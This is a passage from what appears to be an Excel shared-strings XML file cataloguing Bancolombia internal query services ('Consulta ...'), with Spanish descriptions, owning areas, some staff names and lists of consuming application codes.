    <t>El Servicio ConsultaCatalogosDepositos habilita la consulta de los catálogos pertenecientes a las cuentas de depósito incluyendo bolsillos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos. Inicialmente, se habilita la consulta de transacciones que se pueden aplicar en los movimientos monetarios para los bolsillos</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0021001</t>
  </si>
  <si>
    <t>Consulta Centrales Internas</t>
  </si>
  <si>
    <t>El servicio “Consulta Centrales Internas” ofrece la capacidad de recolectar y calcular la información interna del comportamiento crediticio de un cliente en el banco, como es: Factoring, SUFI, Leasing, Bancolombia. Donde posteriormente, se realiza la calificación según las reglas definidas y previamente configuradas; obteniendo un rechazo o aprobación de dicha solicitud.</t>
  </si>
  <si>
    <t>Ecosistema de Riesgo de Crédito</t>
  </si>
  <si>
    <t>Juliana Medina Martinez</t>
  </si>
  <si>
    <t>Consulta Clasificacion Cartera</t>
  </si>
  <si>
    <t>El servicio ConsultaClasificacionCartera, en su versión inicial, cuenta con la capacidad de consultar la clasificación del tipo de cartera para un crédito lo cual hace posible medir el riesgo en el otorgamiento de éste.</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
AW0856</t>
  </si>
  <si>
    <t>Consulta Cliente Preferencial FNG</t>
  </si>
  <si>
    <t>El servicio permite consultar si una Pyme(persona natural o jurídica) que ha sido o está garantizada por el fondo nacional de garantías, hace parte de la base de clientes preferentes, al mismos tiempo entrega la información del cupo disponible.</t>
  </si>
  <si>
    <t>Fondo Nacional de Garantias</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Clientes</t>
  </si>
  <si>
    <t>El servicio ConsultaClientes permitirá la consulta de información de clientes de factoring en varios niveles de detalle.</t>
  </si>
  <si>
    <t>Factoring</t>
  </si>
  <si>
    <t>Lucas Daniel Betancourt</t>
  </si>
  <si>
    <t>Solicitudes de Vinculación_Sucursal Virtual Factoring_AW0423001</t>
  </si>
  <si>
    <t>AW0922 _x000D_
TP _x000D_
Allus</t>
  </si>
  <si>
    <t>Consulta Comision Canales</t>
  </si>
  <si>
    <t>Este servicio permite la consulta de las comisiones que se cobran en los canales digitales banco, en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC, como por ejemplo una transferencia a otro banco, transferencias de fondos, transferencias cuenta Nequi, etc.</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
AW1170 _x000D_
DEVELOPSOATEST _x000D_
AW0955001 _x000D_
NU0146001 _x000D_
NU0149001 _x000D_
NU0215001 _x000D_
NU0051001</t>
  </si>
  <si>
    <t>Consulta Consolidados Cuentas Depositos</t>
  </si>
  <si>
    <t>Servicio que permite a los clientes realizar las consultas de consolidados de cuentas de depósito. Estos consolidados pueden ser de diferentes tipos: consolidados de movimientos, consolidados de saldos, etc. Esto facilita a los clientes consumidores del servicio temas como la representación gráfica en cifras de las cuentas de depósito. Las cuentas de depósito hacen referencia a las cuentas de ahorro y las cuentas corriente del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>Consulta Convenio Nomina</t>
  </si>
  <si>
    <t>El servicio de Consulta Convenio Nomina proporciona a los consumidores, capacidades para obtener información relevante de los Convenios de Nómina, como el grupo de cobro, el tipo de plan, nombre de empleador, nombre del pagador entre otros. Ofrece la posibilidad de realizar la consulta por Nit, por número de convenio o por ambos al mismo tiempo.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1285001 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Consulta Convenio Recaudo</t>
  </si>
  <si>
    <t>El servicio Consulta Convenio Recaudo permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de las apis de recaudos, ya que permite en cual de los dos core se encuentra la información del recaudo y además permitirá identificar el comportamiento de la mismo.</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0021001 _x000D_
AW1176 _x000D_
AW1258011 _x000D_
NU0051001</t>
  </si>
  <si>
    <t>Consulta Convenios De Nomina</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Convenios de nómina permitirá obtener información de los convenios, la información podrá ser buscada por pagador, empleador o beneficiario, retornando información como tal del convenio y plan asociado.  </t>
  </si>
  <si>
    <t>Recaudos o Pagos</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0091001 _x000D_
NU0169001 _x000D_
NU0170001</t>
  </si>
  <si>
    <t>Consulta Costos Tarjeta Debito</t>
  </si>
  <si>
    <t>A través de este servicio, se pueden consultar los costos asociados a una tarjeta débito, como por ejemplo el valor de la cuota de manejo o el costo de reexpedir una tarjeta, etc.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1128 _x000D_
NU0170001 _x000D_
NU0104001</t>
  </si>
  <si>
    <t>Consulta Cuenta Depositos</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x005F_x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente.</t>
  </si>
  <si>
    <t>AW01065 _x000D_
AW0937 _x000D_
SU2 _x000D_
AW1176 _x000D_
AW0856 _x000D_
SUF _x000D_
AW1272001 _x000D_
AW1170 _x000D_
AFC _x000D_
AW0709001 _x000D_
AW1311 _x000D_
AW1365 _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Consulta Cuenta MultiProducto</t>
  </si>
  <si>
    <t>El servicio ConsultaCuentaMultiProducto permitirá a los consumidores consultar las cuentas multi producto asociadas a un cliente en específico en valores, adicionalmente podrá consultar la información de cuentas inscritas en valores y el histórico de cada cuenta.</t>
  </si>
  <si>
    <t>AW1208001 _x000D_
AW1208 _x000D_
AW1298001 _x000D_
NU0160001</t>
  </si>
  <si>
    <t>Consulta Cuenta Recaudo</t>
  </si>
  <si>
    <t>Permite consultar información de la cuenta del recaudo para conocer si es o no exclusiva para recaudo</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1258011</t>
  </si>
  <si>
    <t>Consulta Cuentas AFC</t>
  </si>
  <si>
    <t xml:space="preserve"> Consulta que permite presentar al cliente información relacionada con su estado de cuenta AFC, tal como su valor ahorrado, beneficios ganados y perdidos, saldo disponible para vivienda y saldo disponible para diferente de vivienda, etc. </t>
  </si>
  <si>
    <t>GDE _x000D_
AFC _x000D_
AW1110001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Cuentas Depositos</t>
  </si>
  <si>
    <t>Esta versión habilita las capacidades de consulta para cuentas de ahorro y corriente, el servicio permite a los consumidores consultar por medio de operaciones que devuelven la información básica y detallada según se requiera, adicionalmente tiene capacidades como listar las cuentas de las que es titular un cliente listar las cuentas canceladas y listar participantes.</t>
  </si>
  <si>
    <t>AW1373 _x000D_
NU0104001 _x000D_
NU0064001 _x000D_
AW1315014 _x000D_
NU0010001 _x000D_
AW1258011 _x000D_
NU0139001 _x000D_
AW1365 _x000D_
NU0014001 _x000D_
AW1326001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
AW1315001 _x000D_
NU0091001 _x000D_
NU0146001 _x000D_
AW1151001 _x000D_
NU0001001 _x000D_
AW0360006 _x000D_
NU0142001 _x000D_
NU0135001</t>
  </si>
  <si>
    <t>Consulta Cuota Credito</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento  que se le otorgó.
En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (Valor de la cuota) mientras que el otro concierne a los intereses generados (Tasa nominal mes vencido, Tasa efectiva anual, Valor numérico de la DTF
</t>
  </si>
  <si>
    <t>AW1313 _x000D_
AW1170 _x000D_
AW1287</t>
  </si>
  <si>
    <t>Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir tres componentes. El primero corresponde al reintegro de parte del capital prestado (saldo) el segundo concierne a los intereses generados (interés fijo) y la tercera parte es la de los seguros (retenciones).</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Datos Alertas y Notificaciones</t>
  </si>
  <si>
    <t>El servicio permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken. - Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son número de celular y correo electrónico autorizados para recibir notificaciones.  La anterior información se encuentra almacenada en el sistema de Alertas y Notificaciones.</t>
  </si>
  <si>
    <t>PCC - Programas Comunes Canales_Alertas_ISPCC0002</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
AW0407 _x000D_
AW1313 _x000D_
AW1316001 _x000D_
AW0360007 _x000D_
AW1170 _x000D_
NU0100001 _x000D_
NU0004001 _x000D_
NU0103001 _x000D_
DEVELOPSOATEST _x000D_
AW1185001 _x000D_
AW1316 _x000D_
NU0147001 _x000D_
NU0104001 _x000D_
NU0170001 _x000D_
AW0955001 _x000D_
AW1299001</t>
  </si>
  <si>
    <t>Consulta Datos Cartera</t>
  </si>
  <si>
    <t>El servicio tiene como alcance, la consulta de datos expuestos desde Cartera Bancolombia,  como datos del Maestro de Limites, Garatias, etc.  Dicho servicio será utilizado como primer alcance, en el proceso de Estudio de Crédito Unificado, dirigido a clientes Empresariales y Pymes Gerenciados, para las líneas de Negocio de BANCOLOMBIA, LEASING FACTORING. Las operaciones que serán implementadas como alcance del proyecto ECU Colombia serán la consulta de Cupos Bancolombia y Factotin y la consulta de Garantias</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
AW1176 _x000D_
AW0856 _x000D_
AW1313 _x000D_
AW1294001 _x000D_
NU0114001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Datos Cliente Sufi</t>
  </si>
  <si>
    <t>Este servicio permite la recuperación de la información de los clientes de SUFI, información relacionada con sus datos personales, información económica e información de contacto. A este servicio se le especifica una sola operación, a futuro se espera agregar mas operaciones que permita la consulta segmentada de toda la información de un Cliente; por ejemplo consulta de la información financiera</t>
  </si>
  <si>
    <t>ISSU20003 _x000D_
AW1312001 _x000D_
NU0204001 _x000D_
NU0093001</t>
  </si>
  <si>
    <t>Consulta Datos Comerciales Sucursal</t>
  </si>
  <si>
    <t>Servicio que permite consultar información sobre los códigos de la sucursal, del Gerente y/o asesor de una sucursal, permite realizar búsquedas por el código CIF de la sucursal, el código CIF o la cédula de un asesor.</t>
  </si>
  <si>
    <t>RSA-RELACIÓN SUCURSAL ASESOR_AW1242001</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1313001 _x000D_
AW0856 _x000D_
AW1299001 _x000D_
AW1176001 _x000D_
AW1128 _x000D_
AW1249 _x000D_
AW1249001</t>
  </si>
  <si>
    <t>Consulta Datos Complementarios Cliente</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permite consultar información que es complementaria del cliente, estos datos corresponden a la calificación de riesgo interna, calificación interna, cliente tesorería, entre otros. </t>
  </si>
  <si>
    <t>AW0899001 _x000D_
AW1074001 _x000D_
SVP _x000D_
NU0038001 _x000D_
AW1285001 _x000D_
AW1176 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Consulta Datos Contacto Cliente</t>
  </si>
  <si>
    <t>El servicio permite consultar información para realizar el contacto con los clientes, se retornar datos como, por ejemplo: dirección de residencia, teléfonos, email, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia.</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
NU0098001 _x000D_
AW0360004 _x000D_
AW0748001 _x000D_
AW1281002 _x000D_
NU0143001 _x000D_
AW1074001 _x000D_
SVP _x000D_
AW0611001 _x000D_
AW1206001 _x000D_
AW0360007 _x000D_
NU0104001 _x000D_
AW1302001 _x000D_
NU0004001 _x000D_
NU0064001 _x000D_
AW1281003 _x000D_
NU0010001 _x000D_
AW1313001 _x000D_
NU0035001 _x000D_
AW1151001 _x000D_
NU0046001 _x000D_
NU0146001 _x000D_
NU0149001 _x000D_
NU0142001 _x000D_
AW1326001 _x000D_
AW1365 _x000D_
AW1218001 _x000D_
AW1285001 _x000D_
NU0170001 _x000D_
AW1176 _x000D_
AW0660001 _x000D_
AW0661003 _x000D_
NU0152001 _x000D_
AW1272001 _x000D_
AW1480001 _x000D_
NU0219001 _x000D_
NU0091001 _x000D_
NU0254001 _x000D_
NU0139001</t>
  </si>
  <si>
    <t>Consulta Datos Financieros Cliente</t>
  </si>
  <si>
    <t>El servicio sirve para consultar la información financiera de los clientes (ejemplo: Ingresos, Egresos, Pasivos, Activos, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia.</t>
  </si>
  <si>
    <t>AW0748001 _x000D_
AW1285001 _x000D_
AW0661003 _x000D_
NU0254001 _x000D_
AW1074001</t>
  </si>
  <si>
    <t>Consulta Datos Personales Cliente</t>
  </si>
  <si>
    <t>El servicio permite consultar la información personal básica del cliente (ejemplo: llave MDM, Tipo identificación, identificación, nombre, apellido del cliente, entre otros) y la información detallada del cliente (ejemplo: ciudad de nacimiento, Fecha nacimiento, Primer nombre, Primer apellido, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
NU0034001 _x000D_
AW0360004 _x000D_
AW0748001 _x000D_
AW0899001 _x000D_
AW1258002 _x000D_
AW1281002 _x000D_
NU0143001 _x000D_
AW1074001 _x000D_
SVP _x000D_
NU0038001 _x000D_
AW1272001 _x000D_
AW0611001 _x000D_
GDE _x000D_
NU0104001 _x000D_
NU0014001 _x000D_
AW1302001 _x000D_
AW1310 _x000D_
NU0064001 _x000D_
AW1281003 _x000D_
NU0139001 _x000D_
APP _x000D_
AW1108001 _x000D_
AW0955 _x000D_
PRODUCTORCONSUMIDOR _x000D_
CIF _x000D_
AW1313001 _x000D_
AUD _x000D_
NU0035001 _x000D_
AW1151001 _x000D_
NU0046001 _x000D_
NU0146001 _x000D_
NU0149001 _x000D_
NU0142001 _x000D_
AW0638 _x000D_
AW1365 _x000D_
NU0004001 _x000D_
AW1326001 _x000D_
AW1285001 _x000D_
NU0135001 _x000D_
NU0170001 _x000D_
AW1435001 _x000D_
AW1176 _x000D_
AW0661003 _x000D_
AW1480001 _x000D_
AW1184003 _x000D_
NU0219001 _x000D_
NU0091001 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Consulta Datos Relaciones Cliente</t>
  </si>
  <si>
    <t>El servicio permite consultar la información de las relaciones o vínculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros. El servicio puede ser consultado con el tipo y número de documento original del cliente, o las llaves de los sistemas: CRM, MDM o CIF.  Los clientes consultados corresponden a persona natural y persona jurídica</t>
  </si>
  <si>
    <t>AW0360004 _x000D_
AW1074001 _x000D_
NU0142001 _x000D_
NU0135001 _x000D_
AW1285001 _x000D_
AW1176001 _x000D_
NU0091001 _x000D_
NU0046001 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Consulta Datos Tarjeta Credito</t>
  </si>
  <si>
    <t>Servicio que permite realizar las diferentes consultas de datos asociados a las tarjetas de crédito, donde se retorna información de campos de saldos, consumos, intereses y abonos de la tarjeta de crédito que se pueden exponer a nivel de los clientes.</t>
  </si>
  <si>
    <t>Consulta Datos Tributarios Cliente</t>
  </si>
  <si>
    <t>El servicio permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia.</t>
  </si>
  <si>
    <t>AW0748001 _x000D_
AW1074001 _x000D_
NU0139001 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Consulta De Archivos</t>
  </si>
  <si>
    <t xml:space="preserve">Nos permite realizar la consulta de los archivos tanto Enviados como Recibidos (ejemplo: Novedades, Cobro, Facturación y Anulación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio. _x005F_x000D_ _x005F_x000D_ Y además para proporcionar al cliente una asesoría completa de sus movimientos._x005F_x000D_ </t>
  </si>
  <si>
    <t>AW01065 _x000D_
SVP _x000D_
GDE _x000D_
SVE</t>
  </si>
  <si>
    <t>Consulta De Pagos</t>
  </si>
  <si>
    <t>Consultar Pagos permite al consumidor obtener información de los pagos en el Sistema de Pagos Automáticos PAB, ingresando la información correspondiente a la identificación del cliente pagador y opcionalmente podrá ingresar información asociada a la clase de pago, tipo de pago, beneficiario y cuenta del beneficiario con el fin de acotar la búsqueda. Esta consulta se puede realizar hasta tres meses atrás.</t>
  </si>
  <si>
    <t>Consulta De Saldos Cuentas Depositos</t>
  </si>
  <si>
    <t>El Servicio Consulta De Saldos Cuentas Depósitos permite a los consumidores obtener el detalle de los saldos que tiene una cuenta en particular o listar los saldos de todas las cuentas de un cliente. Se puede consultar por ejemplo el saldo disponible, saldo con cupo de sobregiro, saldo en canje, saldo en cuentas por cobrar, saldo bloqueado entre otros.</t>
  </si>
  <si>
    <t>AW1170 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0001001</t>
  </si>
  <si>
    <t>Consulta De Tarifas Tarjetas Debito</t>
  </si>
  <si>
    <t>El servicio Consulta de Tarifas permite exponer los diferentes valores asociados a una tarjeta débito
- Consultar Cuota de Manejo: Expone los datos relacionados con la cuota de manejo de la tarjeta débito dependiendo del
plan de la cuenta, clase de la tarjeta y grupo de cobro.</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0091001</t>
  </si>
  <si>
    <t>Consulta Desembolso Credito Pyme</t>
  </si>
  <si>
    <t>El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme.</t>
  </si>
  <si>
    <t xml:space="preserve">Automatización de Procesos </t>
  </si>
  <si>
    <t>Bizagi Go_AW0856001</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme. </t>
  </si>
  <si>
    <t>AW1170 _x000D_
AW1287 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consulta Documentos Cuenta Depositos</t>
  </si>
  <si>
    <t>El servicio ConsultaDocumentosCuentaDepositos permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas de sus productos como cuenta corriente o ahorros.</t>
  </si>
  <si>
    <t>DEP - Servicios Depositos_ISDEP0001</t>
  </si>
  <si>
    <t>AW1272001</t>
  </si>
  <si>
    <t>Consulta Documentos Tarjeta Credito</t>
  </si>
  <si>
    <t>El servicio ConsultaDocumentosTarjetaCredito permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas y paz y salvos de sus tarjetas de crédito.</t>
  </si>
  <si>
    <t>Consulta Extendida De Saldos</t>
  </si>
  <si>
    <t>El servicio ConsultaExtendidaDeSaldos tiene como objetivo realizar la consulta de saldos de las cuentas depósitos (Ahorros /Corriente) de un cliente Bancolombia de la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.&amp;</t>
  </si>
  <si>
    <t>Depósitos (Cuentas Corriente y de Ahorro) Personalizacion_ISBVD0001</t>
  </si>
  <si>
    <t>NU0017001 _x000D_
AW1272001 _x000D_
AW1302001 _x000D_
SVE _x000D_
AW0360</t>
  </si>
  <si>
    <t>Consulta Extractos Cliente</t>
  </si>
  <si>
    <t>El servicio permite la consultar los extractos y los periodos disponibles para consulta, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF.</t>
  </si>
  <si>
    <t>Paradoc - Extracto Unificado FE_EUC,COLD,EBP, MAM_AW0826001</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
AW1272001 _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Consulta Facturas Inscritas</t>
  </si>
  <si>
    <t>El servicio consulta de facturas inscritas permitirá conocer las facturas que tienen registradas un pagador con sus caracteristicas, como son: Disponibilidad para pago, si está ligada a un debito automatico, canal, fecha de registro, entre otros.</t>
  </si>
  <si>
    <t>Consulta Fondos</t>
  </si>
  <si>
    <t>El servicio Consulta Fondos, agrupa todas las consultas (Específicas y detalladas) que se le pueden hacer a los Fondos de inversión de los productos de valores y fiduciaria del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>Negocios Fiduciarios y Fondos</t>
  </si>
  <si>
    <t>Framework Servicios Fiduciaria_ISFSF0001</t>
  </si>
  <si>
    <t>AW0637001 _x000D_
AW0360004 _x000D_
SVE _x000D_
AW1185001 _x000D_
AW1177001 _x000D_
NU0170001</t>
  </si>
  <si>
    <t>Este servicio permitirá a los consumidores realizar la consulta específica y detallada de los fondos de inversión colectiva (FIC) del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>AW1185001 _x000D_
NU0021001 _x000D_
NU0149001 _x000D_
AW1177001 _x000D_
SVE _x000D_
NU0160001 _x000D_
NU0170001 _x000D_
NU0153001 _x000D_
NU0146001 _x000D_
AW0955001 _x000D_
NU0051001</t>
  </si>
  <si>
    <t>Consulta Fuentes Privadas Externas</t>
  </si>
  <si>
    <t>Servicio que permite conocer si un documento es válido y adicionalmente traer información de ese documento. Bien sea de personas naturales o jurídicas.</t>
  </si>
  <si>
    <t>Consulta Gestion Comercial Cliente</t>
  </si>
  <si>
    <t>El servicio posibilita a nuevos consumidores o nuevos componentes la reutilización expuesta por el servicio ConsultaGestionComercialCliente, el cual sirve para consultar información de Gestión comercial de los clientes. El servicio obtiene su información de componentes de integración del tipo función de mediación, los cuales implementa las operaciones correspondientes para acceder a cada funcionalidad provista por los datos maestros de MDM de información implementadas a través de procedimientos almacenados. Este servicio consulta la información de datos maestros de los clientes de Colombia.  El servicio actual cuenta con 2 operaciones las cuales permiten consultar la información a la base de datos MDM enviando la llave de identificación del cliente (CIF;CRM;MDM;NumeroIDentificacion;documentoExterno), retornando la información específica del cliente,  convirtiéndose en un componente de consulta general  de Master Data Management (MDM),  que pueda ser utilizado para diferentes necesidades de información de los frentes  y no quedar ligado o ser una consulta exclusiva que retorne la información a la medida de una sola necesidad</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
AW0360004 _x000D_
AW1285001 _x000D_
AW0748001 _x000D_
AW0899001 _x000D_
AW1074001 _x000D_
SVP _x000D_
NU0038001 _x000D_
AW1272001 _x000D_
AW1302001 _x000D_
MAT _x000D_
NU0114001 _x000D_
AW1313001 _x000D_
NU0046001 _x000D_
AW1326001 _x000D_
AW1250 _x000D_
NU0135001 _x000D_
NU0021001 _x000D_
AW1249001 _x000D_
NU0034001 _x000D_
AW1281003 _x000D_
NU0032001 _x000D_
AW1176 _x000D_
AW0661003 _x000D_
AW1151001 _x000D_
AW1176001 _x000D_
NU0254001</t>
  </si>
  <si>
    <t>Consulta Gestion Tarjetas Debito</t>
  </si>
  <si>
    <t>El servicio Consulta Gestión tarjetas Débito permite consultar la gestión que se han realizado en una tarjeta débito:</t>
  </si>
  <si>
    <t>Consulta GMF</t>
  </si>
  <si>
    <t xml:space="preserve">El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar el detalle de la marcación de la cuenta sobre el impuesto GMF (Gravamen a movimientos financieros). </t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0091001 _x000D_
NU0170001</t>
  </si>
  <si>
    <t>Consulta Grupos De Riesgo</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance consultar los integrantes de los grupos de Riesgo Legales y administrativos o internos de un cliente empresarial.</t>
  </si>
  <si>
    <t>AW1176 _x000D_
AW0922 _x000D_
AW1294001</t>
  </si>
  <si>
    <t>Consulta Informacion Bolsillos</t>
  </si>
  <si>
    <t>Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaInformacionBolsillos habilita las capacidades de consulta de bolsillos como, por ejemplo, consultar los bolsillos de una cuenta de ahorros en específico, consultar el detalle de un bolsillo, listar las diferentes categorías por las cuales se puede separar el dinero entre otras.</t>
  </si>
  <si>
    <t>NU0021001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0146001 _x000D_
NU0149001</t>
  </si>
  <si>
    <t>Consulta Informacion Cliente Empresarial</t>
  </si>
  <si>
    <t>El servicio Consulta Información Cliente Empresarial permite la consulta de información general, información financiera y la información de contactos, accionistas y miembros de junta de una empresa particular sea persona natural o jurídica.</t>
  </si>
  <si>
    <t>Clientes Empresas</t>
  </si>
  <si>
    <t>BIZTRACK_AW0998001</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1176 _x000D_
AW0856 _x000D_
AW0360004</t>
  </si>
  <si>
    <t>Consulta Informacion Cuentas Depositos</t>
  </si>
  <si>
    <t>El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente.</t>
  </si>
  <si>
    <t>FINACLE</t>
  </si>
  <si>
    <t>APIC</t>
  </si>
  <si>
    <t>AW0360010</t>
  </si>
  <si>
    <t>Consulta Informacion Cuentas Plazos Fijos</t>
  </si>
  <si>
    <t>El servicio ConsultaInformacionCuentasPlazosFijos proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre la información las cuentas de plazos fijos.</t>
  </si>
  <si>
    <t>Consulta Informacion Entrega Token SVE</t>
  </si>
  <si>
    <t>El servicio permite que se realicen consultas sobre la gestión de entrega de los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia.</t>
  </si>
  <si>
    <t>MQ y Broker</t>
  </si>
  <si>
    <t xml:space="preserve">                                             </t>
  </si>
  <si>
    <t>STI _x000D_
AW1123001 _x000D_
GDE _x000D_
TP _x000D_
Allus</t>
  </si>
  <si>
    <t>Consulta Informacion Fiscal Y Parafiscal Del Cliente</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite la consulta de la información usada dentro de los aportes de a la planilla de seguridad social (PILA), información entregada por ACH con su producto SOI-DATA, lo que permite tener datos del Cliente como su salario básico actual, los detalles de empresa donde trabaja el cliente consultado, si se encuentra activo como empleado, el ingreso de la base de cotización de pensión, salud y caja de compensación. Información que permitiría revisar el estado actual salarial y de su empresa. </t>
  </si>
  <si>
    <t>ACH</t>
  </si>
  <si>
    <t>Consulta Informacion Fondos Fiduciarios</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar las consultas de los movimientos fiduciarios como Adiciones, cancelaciones, retiros y adiciones entre fondos de inversión colectiva, al igual que aquellos movimientos históricos, y del portafolio que se tiene con el producto InvesBot.</t>
  </si>
  <si>
    <t>AW1187001</t>
  </si>
  <si>
    <t>Consulta Informacion Prestamos</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite consultar los préstamos que tiene un cliente, consultar los prestamos que tiene un convenio empresarial, consultar el detalle y los movimientos de un préstamo en particular. </t>
  </si>
  <si>
    <t>AW1294001 _x000D_
AW0360007</t>
  </si>
  <si>
    <t>AW1313 _x000D_
AW1294001 _x000D_
AW1272001 _x000D_
AW0360007 _x000D_
AW1170 _x000D_
AW0955 _x000D_
DEVELOPSOATEST _x000D_
AW0955001</t>
  </si>
  <si>
    <t>El servicio expone métodos que hacen posible la consulta de información general de préstamos a partir de datos de identificación del titular o convenio empresarial, así como consultas de movimientos y de detalles de una obligación crediticia.</t>
  </si>
  <si>
    <t>Consulta Informacion Recaudos</t>
  </si>
  <si>
    <t>Este servicio realizara las consultas requeridas con todos lo relacionado con Recaudos: la consulta de listas de convenios, consulta histórico de recaudos, consulta del detalle de los convenios, consulta del histórico de pagos, consulta de pagadores inscritos, consulta de las oficinas habilitadas y consulta de histórico de la programación del débito automático.</t>
  </si>
  <si>
    <t>ALM _x000D_
SVP _x000D_
GDE _x000D_
APP _x000D_
PSE _x000D_
SVE</t>
  </si>
  <si>
    <t>Consulta Informacion Tarjeta Credito</t>
  </si>
  <si>
    <t>El servicio consulta información tarjeta crédito, traerá todas las tarjetas activas principales que tiene el cliente asociado a una o varias cuentas (crédito visa cayman).</t>
  </si>
  <si>
    <t xml:space="preserve"> Servicio que permite realizar las diferentes consultas de la información de tarjetas de crédito, donde se podrá retornar información de campos de estados, saldos, deudas y fechas de la tarjeta que se pueden exponer a nivel de los clientes._x005F_x000D_ _x005F_x000D_ Este servicio está construido para poder brindar servicios de consulta de información de las tarjetas de crédito a los clientes; esto en el contexto funcional de la línea de negocio de Tarjetas (Producto de Bancolombia).</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1170</t>
  </si>
  <si>
    <t>Consulta Informacion Token SVE</t>
  </si>
  <si>
    <t>El servicio permite que se realicen consultas al proveedor Todo1 sobre los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia.</t>
